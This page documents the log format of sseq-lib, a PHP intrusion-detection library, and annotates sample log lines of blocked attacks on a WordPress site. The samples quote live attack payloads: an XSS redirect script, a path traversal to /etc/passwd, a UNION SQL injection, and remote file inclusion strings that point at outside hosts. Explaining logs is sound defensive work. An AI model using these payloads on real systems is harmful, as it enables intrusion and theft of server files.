Understanding sseq-lib log file

To understand what kind of attacks have been blocked by sseq-lib you should occasionally take a look into the log file you find under „sseq-lib/seq_log/log.txt“. Each blocked attack is logged here with an explication of why it has been blocked.

 !  Do not open „log.txt“ with your web browser! You could execute some of the malicious code that has been written into the log file!

Each line of the log file represents an attack or the detection of a possible attack which is triggered by the integrated, lightweight IDS (intrusion detection system).

Understanding Log data

Splitting every log line by the comma (,) will result in the following data:

1. date
2. time
3. IP of attacking client
4. where the attack string has been found

  • [_GET] : $_GET
  • [HGET] : $HTTP_GET_VARS
  • [_POS] : $_POST
  • [HPOS] : $HTTP_POST_VARS
  • [_COO] : $_COOKIE
  • [HCOO] : $HTTP_COOKIE_VARS
  • [_SES] : $_SESSION
  • [HSES] : $HTTP_SESSION_VARS
  • [_REQ] : $_REQUEST
  • [_GLO] : $GLOBALS

5. explanation of what happened. If the variable name which carried the payload is known it will be named.
6. attack payload
7. used method: GET, POST
8. the file which was used for the attack
9. User Agent of the attacking client
10. referer

Here some examples of blocked attacks against a WordPress installation and their corresponding log line.

XSS (Cross Site Scripting)

Example from log file:
<br />
12.03.201006:16:42xxx.xxx.xx.xx, [_GET], pINT param not INT99&#8243;><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script>, GET, /index.php, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2),<br />

So here slice by slice:
<br />
1. 12.03.2010 (explanationdate)<br />
2. 06:16:42 (explanationtime)<br />
3. xxx.xxx.xx.xx (IP) (explanationsome typical IP)<br />
4. [_GET] (explanationattack string was found in super global $_GET)<br />
5. pINT param not INT (explanationvariable &#8222;p&#8220; was not an integer/number)<br />
6. 99&#8243;><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script> (explanation: attack payload &#8211; create an iframe)<br />
7. GET (explanationattack was performed through a GET request)<br />
8. /index.php (explanationattack was initiated on this file)<br />
9. Mozilla/4.0 (compatibleMSIE 7.0Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022InfoPath.2) (explanationuser agent of client)<br />
10. EMPTY (explanationno referer)<br />

Relative Path Traversal.

Example from log file:
<br />
29.03.201022:16:38xxx.xxx.xx.xx, [_GET], pINT param not INT, ../../../../../../../../../../../../../../../../../../../../../../../etc/passwd GET, /index.phpDataCha0s/2.0,<br />

Here the attack payload.

<br />
../../../../../../../../../../../../../../../../../../../../../../../
etc/passwd<br />

SQL Injection

Example from log file:
<br />
08:
03:28xxx.xxx.xx.xx, [_GET], page_idINT param not INT133 and 1=0  Union Select 0x787878756E696F6E787878&#8211;, GET, /index.php, ,<br />

Here the attack payload.

<br />
133 and 1=0  Union Select 0x787878756E696F6E787878&#8211;<br />

Code Injection

Example from log file:
<br />
23.07.201004:12:41xxx.xxx.xx.xx, [_GET], pINT param not INT446  //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??, GET, /index.php, Mozilla/5.0,<br />

Here the attack payload.

<br />
446  //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??<br />

Globals Overwrite

Example from log file:
<br />
19.07.2010, 09:27:19xxx.xxx.xx.xx, [_GET], pINT param not INT26  ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???, GET, /index.php, Mozilla/5.0,<br />

Here the attack payload.

<br />
26  ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???<br />

Das könnte Dich auch interessieren …

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.